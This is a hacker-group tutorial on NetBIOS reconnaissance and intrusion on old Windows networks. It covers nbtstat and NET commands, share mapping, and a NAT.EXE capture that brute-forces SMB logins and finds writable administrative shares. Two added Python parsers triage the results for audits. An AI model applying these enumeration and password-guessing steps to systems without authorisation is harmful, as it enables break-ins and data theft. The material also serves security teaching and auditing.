
Team Hacking Beast Presents

Complete guide on NetBIOS

What is NetBIOS?

NetBIOS stands for Network Basic Input Output System. It was originally developed by IBM and Sytek as an application program interface (API) for client software to access LAN resources. By default it runs on port 139. NetBIOS exposes various information about the computers on a network, including computer name, username, domain, group and many others.

Remote Network Penetration via NetBIOS Hacking


These are basic techniques but very useful when penetration testing any Windows based network. The techniques were discovered on Windows NT but are still valid on Windows 2000 and, in some cases, Windows 2003 due to backwards compatibility.

This article is written in a procedural manner: I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.

When targeting a given network, the first thing an intruder would do is port scan the remote machine or network. A lot of information can be gathered by a simple port scan, but what the intruder is looking for is an open port 139, the default NetBIOS port. It is surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine. Intruders learn to view a port scan and tell whether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done. Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.

Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in. If the port scan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command. The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits. Interpreting the information can reveal more than one might think.

Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

Switches:
  -a   Lists the remote computer's name table given its host name.
  -A   Lists the remote computer's name table given its IP address.
  -c   Lists the remote name cache including the IP addresses.
  -n   Lists local NetBIOS names.
  -r   Lists names resolved by broadcast and via WINS.
  -R   Purges and reloads the remote cache name table.
  -S   Lists sessions table with the destination IP addresses.
  -s   Lists sessions table conversions.

The column headings generated by NBTSTAT have the following meanings:

  Input        Number of bytes received.
  Output       Number of bytes sent.
  In/Out       Whether the connection is from the computer (outbound) or from another system to the local computer (inbound).
  Life         The remaining time that a name table cache entry will "live" before your computer purges it.
  Local Name   The local NetBIOS name given to the connection.
  Remote Host  The name or IP address of the remote host.
  Type         A name can have one of two types: unique or group. The last byte of the 16-character NetBIOS name often means something because the same name can be present multiple times on the same computer. This shows the last byte of the name converted into hex.
  State        Your NetBIOS connections will be shown in one of the following "states":

  State          Meaning
  Accepting      An incoming connection is in process.
  Associated     The endpoint for a connection has been created and your computer has associated it with an IP address.
  Connected      This is a good state! It means you're connected to the remote resource.
  Connecting     Your session is trying to resolve the name-to-IP address mapping of the destination resource.
  Disconnected   Your computer requested a disconnect, and it is waiting for the remote computer to do so.
  Disconnecting  Your connection is ending.
  Idle           The remote computer has been opened in the current session, but is currently not accepting connections.
  Inbound        An inbound session is trying to connect.
  Listening      The remote computer is available.
  Outbound       Your session is creating the TCP connection.
  Reconnecting   If your connection failed on the first attempt, it will display this state as it tries to reconnect.

Another way of hacking through NetBIOS


This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, and Windows 98 beta 2.1. One of the components being used is NAT.EXE. A discussion of the tool, its switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

Switches:
  -o         Specify the output file. All results from the scan will be written to the specified file, in addition to standard output.
  -u         Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server. Usernames should appear one per line in the specified file.
  -p         Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server. Passwords should appear one per line in the specified file.
  <address>  Addresses should be specified in comma-delimited format, with no spaces. Valid address specifications include:
               hostname               "hostname" is added
               127.0.0.1-127.0.0.3    adds addresses 127.0.0.1 through 127.0.0.3
               127.0.0.1-3            adds addresses 127.0.0.1 through 127.0.0.3
               127.0.0.1-3,7,10-20    adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, and 127.0.0.10 through 127.0.0.20
               hostname,127.0.0.1-3   adds "hostname" and 127.0.0.1 through 127.0.0.1
             All combinations of hostnames and address ranges as specified above are valid.

[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ([5.0.6] The Nbtstat Command). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non-Microsoft tools. What follows is pretty much a step-by-step guide to using NBTSTAT as well as extra information. Again, if you're interested in more NBTSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.

C:\>nbtstat -A XXX.XX.XXX.XX

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial listing of NetBIOS 16th-byte (suffix) values:

  Computername <00> UNIQUE   Workstation Service name
  <00> GROUP                 Domain name
  Server <20> UNIQUE         Server Service name
  Computername <03> UNIQUE   Registered by the Messenger service. This is the computer name to be added to the LMHOSTS file, which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood.
  Username <03>              Registered by the Messenger service.
  Domainname <1B>            Registers the local computer as the master browser for the domain.
  Domainname <1C>            Registers the computer as a domain controller for the domain (PDC or BDC).
  Domainname <1D>            Registers the local client as the local segment's master browser for the domain.
  Domainname <1E>            Registers as a group NetBIOS name.
  <BF>                       Network Monitor Name
  <BE>                       Network Monitor Agent
  <06>                       RAS Server
  <1F>                       Net DDE
  <21>                       RAS Client
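To turn a name table like the one above into the roles the suffix listing describes, here is an added Python example (not part of the original guide or of any Microsoft tool). It embeds the capture above as sample input, keys the suffix table on (suffix, type) because <00> and <03> mean different things for UNIQUE and GROUP names, and reports what an auditor wants from the table: host, domain, whether the machine is a domain controller or offers shares, and which logged-on users the Messenger service has registered.

```python
import re
# nbtstat -A output transcribed from the capture above (values as printed there).
SAMPLE = """\
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
MAC Address = 00-C0-4F-C4-8C-9D
"""
# (suffix, type) -> role, a subset of the suffix listing above; one suffix can mean
# different things for UNIQUE and GROUP names, hence the two-part key.
SUFFIX_ROLE = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger Service (computer or logged-on user name)",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controller (PDC or BDC)",
    ("1D", "UNIQUE"): "Segment Master Browser",
    ("1E", "GROUP"): "Browser election group",
    ("20", "UNIQUE"): "Server Service (file/print shares offered)",
    ("01", "GROUP"): "Master Browser announcement (__MSBROWSE__)",
}
ENTRY = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f-]{17})")
def parse_nbtstat(text):
    """Parse the name table into a list of dicts plus the MAC address."""
    names, mac = [], None
    for line in text.splitlines():
        if m := ENTRY.match(line):
            name, suffix, ntype, status = m.groups()
            key = (suffix.upper(), ntype)
            names.append({"name": name, "suffix": key[0], "type": ntype, "status": status,
                          "role": SUFFIX_ROLE.get(key, "unknown suffix")})
        elif m := MAC.search(line):
            mac = m.group(1).upper()
    return {"names": names, "mac": mac}
def summarize(parsed):
    """Host, domain, roles, and logged-on users (<03> names that differ from the host)."""
    by = {(n["suffix"], n["type"]): n["name"] for n in parsed["names"]}
    host = by.get(("00", "UNIQUE"))
    users = sorted({n["name"] for n in parsed["names"]
                    if n["suffix"] == "03" and n["type"] == "UNIQUE" and n["name"] != host})
    return {"hostname": host, "domain": by.get(("00", "GROUP")),
            "domain_controller": ("1C", "GROUP") in by,
            "serves_files": ("20", "UNIQUE") in by, "logged_on_users": users}
```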

[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a DOS window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline of a NET command batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:

[8.0.4] Net Accounts: Shows current settings for password, logon limitations, and domain information. It also contains options for updating the user accounts database and modifying password and logon requirements.
[8.0.5] Net Computer: Adds or deletes computers from a domain's database.
[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.
[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.
[8.0.8] Net File: Lists the open files on a server and has options for closing shared files and removing file locks.
[8.0.9] Net Group: Displays information about group names and has options you can use to add or modify global groups on servers.
[8.1.0] Net Help: Help with these commands.
[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.
[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.
[8.1.3] Net Name: Shows the names of computers and users to which messages are sent on the computer.
[8.1.4] Net Pause: Use this command to suspend a certain NT service.
[8.1.5] Net Print: Displays print jobs and shared queues.
[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.
[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.
[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.
[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Be aware that stopping one service may stop other services.
[8.2.1] Net Time: Displays or sets the time for a computer or domain.
[8.2.2] Net Use: Displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
[8.2.3] Net User: Displays a list of user accounts for the computer, and has options for creating and modifying those accounts.
[8.2.4] Net View: Displays a list of resources being shared on a computer, including NetWare servers.

[8.2.5] Special note on DOS and older Windows machines: The commands listed above are available on Windows NT Server and Workstation. DOS and older Windows clients have these NET commands available:
  Net Config
  Net Diag (runs the diagnostic program)
  Net Help
  Net Init (loads protocol and network adapter drivers)
  Net Logoff
  Net Logon
  Net Password (changes password)
  Net Print
  Net Start
  Net Stop
  Net Time
  Net Use
  Net Ver (displays the type and version of the network redirector)
  Net View

For this section, the commands being used are NET VIEW and NET USE.

[8.2.6] Actual NET VIEW and NET USE screen captures during a hack.

C:\>net view XXX.XX.XXX.XX
Shared resources at XXX.XX.XXX.XX

Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
NETLOGON     Disk             Logon server share
Test         Disk
The command completed successfully.

NOTE: The C$, ADMIN$ and IPC$ shares are hidden and are not shown.

C:\>net use /?
The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
        [/USER:[domainname\]username]
        [[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]

C:\>net use x: \\XXX.XX.XXX.XX\test
The command completed successfully.

C:\unzipped\nat10bin>net use
New connections will be remembered.

Status   Local   Remote                 Network
-------------------------------------------------------------------------------
OK       X:      \\XXX.XX.XXX.XX\test   Microsoft Windows Network
OK               \\XXX.XX.XXX.XX\test   Microsoft Windows Network
The command completed successfully.

Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:\>nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX,YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'

[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
        Sharename   Type   Comment
        ---------   ----   -------
        ADMIN$      Disk:  Remote Admin
        C$          Disk:  Default share
        IPC$        IPC:   Remote IPC
        NETLOGON    Disk:  Logon server share
        Test        Disk:
[*]--- This machine has a browse list:
        Server      Comment
        ---------   -------
        STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.
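When reviewing the output of an audit run like the capture above, the lines that matter are the WARNING lines and the account that got a session. The following Python, added here and not part of NAT.EXE or the original guide, groups a capture by host, keeps only those findings (the username, never the password), and ranks each host; the embedded capture is a constructed excerpt in the same line format using documentation addresses rather than real systems.

```python
import re
# Constructed excerpt in the format of the NAT.EXE capture above; the hosts are
# documentation addresses, not real systems.
NAT_LOG = r"""
[*]--- Checking host: 192.0.2.10
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Checking host: 192.0.2.11
[*]--- WARNING: Able to access share: \\*SMBSERVER\Public
[*]--- Checking host: 192.0.2.12
[*]--- Unable to connect
"""
HOST = re.compile(r"Checking host:\s+(\S+)")
CRED = re.compile(r"CONNECTED: Username: `([^']*)'")   # username only; the password is not kept
READ = re.compile(r"WARNING: Able to access share:\s+(\S+)")
WRITE = re.compile(r"WARNING: Directory is writeable:\s+(\S+)")
def triage_nat(text):
    """Group the capture by host and keep only the lines that are findings."""
    findings, cur = {}, None
    for line in text.splitlines():
        if m := HOST.search(line):
            cur = findings.setdefault(m.group(1),
                                      {"guessed_user": None, "readable": [], "writable": []})
        elif cur is None:
            continue                       # lines before the first host header
        elif m := CRED.search(line):
            cur["guessed_user"] = m.group(1)
        elif m := READ.search(line):
            cur["readable"].append(m.group(1))
        elif m := WRITE.search(line):
            cur["writable"].append(m.group(1))
    return findings
def severity(f):
    """A guessed account or a writable administrative share (ADMIN$, C$) is the worst case."""
    admin = any(s.upper().endswith(("\\ADMIN$", "\\C$")) for s in f["writable"])
    if f["guessed_user"] or admin:
        return "critical"
    return "high" if f["writable"] else "medium" if f["readable"] else "info"
def report(text):
    """Map each host to its severity, worst first."""
    rank = {"critical": 0, "high": 1, "medium": 2, "info": 3}
    sev = {h: severity(f) for h, f in triage_nat(text).items()}
    return sorted(sev.items(), key=lambda kv: rank[kv[1]])
```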

A Small Guide on NetBIOS Hacking by Ashray Anand, Editor-in-Chief [Hacking Beast]
